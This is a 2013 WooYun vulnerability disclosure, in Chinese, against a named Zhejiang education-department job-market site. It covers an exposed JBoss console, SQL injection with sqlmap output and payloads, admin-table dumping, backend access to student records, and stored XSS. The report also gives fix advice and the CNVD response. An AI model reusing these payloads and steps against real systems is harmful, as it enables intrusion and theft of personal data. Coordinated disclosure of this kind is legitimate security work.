当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024845

漏洞标题:某省教育厅某下属网站漏洞合集,可修改上报教育部就业率,千万大学生数万就业单位个人信息泄露

相关厂商:某省教育厅

漏洞作者: hqdvista

提交时间:2013-05-31 10:51

修复时间:2013-07-15 10:51

公开时间:2013-07-15 10:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-31: 细节已通知厂商并且等待厂商处理中
2013-06-02: 厂商已经确认,细节仅向厂商公开
2013-06-12: 细节向核心白帽子及相关领域专家公开
2013-06-22: 细节向普通白帽子公开
2013-07-02: 细节向实习白帽子公开
2013-07-15: 细节向公众公开

简要描述:

某省教育厅下属某网站存在多个漏洞,可修改上报教育部的就业率,获取千万大学生和数十万就业单位账号密码及资料,修改招聘会,修改offer,短信轰炸,邮件轰炸,挂马等等:只有想不到,没有做不到

详细说明:

问题网站是浙江省教育厅下属的网上就业市场www.ejobmart.cn,大概有jboss控制台泄露、sqli、xss问题
首先是一个jboss console的问题
http://www.ejobmart.cn/jmx-console/

Screen Shot 2013-05-31 at 2.20.53 AM.png


http://www.ejobmart.cn/web-console/

Screen Shot 2013-05-31 at 2.18.15 AM.png


但是从这个console不能拿到shell,msf利用失败。虽然这样还是获得了一个关键信息:管理后台的地址

Screen Shot 2013-05-31 at 2.20.53 AM.png


随后结合这两个注入点:

www.ejobmart.cn/workguide.html?columnid=185
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: columnid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: columnid=185 AND 2645=2645
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: columnid=185 AND 1439=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(76)||CHR(116)||CHR(109),5)
---
[02:26:37] [INFO] the back-end DBMS is Oracle
web application technology: Tomcat 5.0, JSP, Servlet 2.5
back-end DBMS: Oracle
[02:26:37] [INFO] fetching columns for table 'XT_ADMINUSER' in database 'EJOBHOME'
[02:26:37] [INFO] resumed: 14
[02:26:37] [INFO] retrieving the length of query output
[02:26:37] [INFO] retrieved:
[02:26:37] [INFO] resumed: QQ
[02:26:37] [INFO] retrieving the length of query output
[02:26:37] [INFO] retrieved:
[02:26:37] [INFO] resumed: LOGINTIME
[02:26:37] [INFO] retrieving the length of query output
[02:26:37] [INFO] retrieved:
[02:26:37] [INFO] resumed: LOGINID
[02:26:37] [INFO] retrieving the length of query output
[02:26:37] [INFO] retrieved:
[02:26:37] [INFO] resumed: LOGINNAME
[02:26:37] [INFO] retrieving the length of query output
[02:26:37] [INFO] retrieved:
[02:26:37] [INFO] resumed: PSW



http://www.ejobmart.cn:80/enterpriseinfo.html?unitid=CF7217F846C8ABBAE04010AC14976315
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: unitid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: unitid=CF7217F846C8ABBAE04010AC14976315' AND 2192=2192 AND 'UFPR'='
UFPR
---
[02:24:26] [INFO] the back-end DBMS is Oracle
web application technology: Tomcat 5.0, JSP, Servlet 2.5
back-end DBMS: Oracle


然后通过猜解数据库和表结构,确定管理员表为EJ**HOME中的ADMIN****. 将数据dump下来,获得几个admin账号及各校就业处工作站的账号

Screen Shot 2013-05-31 at 2.32.09 AM.png


用一个账号登陆后台,功能还是很多的

Screen Shot 2013-05-31 at 12.57.31 AM.png


上报教育厅和教育部的地方:

Screen Shot 2013-05-31 at 12.53.31 AM.png


查询任意大学生信息

Screen Shot 2013-05-31 at 12.39.18 AM.png


Screen Shot 2013-05-31 at 12.39.25 AM.png


各校工作站账号可在管理员控制界面操作,将学生信息导出成xls
公司信息、offer信息、短信后台

Screen Shot 2013-05-31 at 12.56.43 AM.png


注意公司信息里面是可以得到md5后的hash,可用来猜解密码。

Screen Shot 2013-05-31 at 12.43.52 AM.png


Screen Shot 2013-05-31 at 12.54.14 AM.png


邮件平台可附带附件挂马,就不截图了。
最后还有几个xss问题例子:
1. 留言板存储型xss

Screen Shot 2013-05-31 at 2.48.08 AM.png


Screen Shot 2013-05-31 at 2.49.20 AM.png


2. 个人简历处存储型xss,可插入联系方式等地方,可以拿来打用人单位和管理员,拿敝校妹子做个示范

Screen Shot 2013-05-31 at 2.52.26 AM.png


Screen Shot 2013-05-31 at 2.54.15 AM.png


漏洞证明:

如上,就不赘述了

修复方案:

给jmx-console加访问控制,管理员用强密码
另外代码需要重新review,sqli和xss不少,或者干脆用waf

版权声明:转载请注明来源 hqdvista@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-06-02 22:54

厂商回复:

CNVD确认并复现所述情况(XSS盲打一般不直接复现),转由CNCERT下发浙江分中心,由浙江分中心后续协调网站管理单位处置。
按多个漏洞进行评分,rank=2+10+6

最新状态:

暂无


漏洞评价:

评论